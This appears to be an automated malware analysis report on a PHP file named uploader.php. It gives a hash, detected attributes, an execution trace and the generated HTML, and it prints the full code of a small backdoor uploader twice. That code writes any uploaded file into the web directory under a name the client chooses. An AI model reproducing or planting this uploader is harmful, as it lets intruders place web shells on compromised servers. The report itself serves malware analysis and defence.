PHP Malware Analysis
uploader.php
md5: e80b659b88ea568b19cd853c790a28f2
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Files
- file_get_contents (Deobfuscated, Original)
- file_put_contents (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
Deobfuscated PHP code
<!-- Anti 403 -->
<!-- Uploader by Unknown45 -->
<form method="post" enctype="multipart/form-data">
<input type="file" name="uk45">
<button>Gaskan</button>
</form>
<?php
if (isset($_FILES['uk45'])) {
file_put_contents($_FILES['uk45']['name'], file_get_contents($_FILES['uk45']['tmp_name']));
if (file_exists("./" . $_FILES['uk45']['name'])) {
echo "Oke !";
} else {
echo "Fail !";
}
}
?>
Execution traces
data/traces/e80b659b88ea568b19cd853c790a28f2_trace-1676243005.0783.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:03:50.976081]
1 0 1 0.000135 393528
1 3 0 0.000193 396160 {main} 1 /var/www/html/uploads/uploader.php 0 0
1 3 1 0.000211 396160
0.000238 314240
TRACE END [2023-02-12 21:03:50.976210]
Generated HTML code
<html><head></head><body><form method="post" enctype="multipart/form-data">
<input type="file" name="uk45">
<button>Gaskan</button>
</form>
</body></html>Original PHP code
<!-- Anti 403 -->
<!-- Uploader by Unknown45 -->
<form method="post" enctype="multipart/form-data">
<input type="file" name="uk45">
<button>Gaskan</button>
</form>
<?php
if (isset($_FILES['uk45'])) {
file_put_contents($_FILES['uk45']['name'], file_get_contents($_FILES['uk45']['tmp_name']));
if (file_exists("./".$_FILES['uk45']['name'])) {
echo "Oke !";
} else {
echo "Fail !";
}
}
?>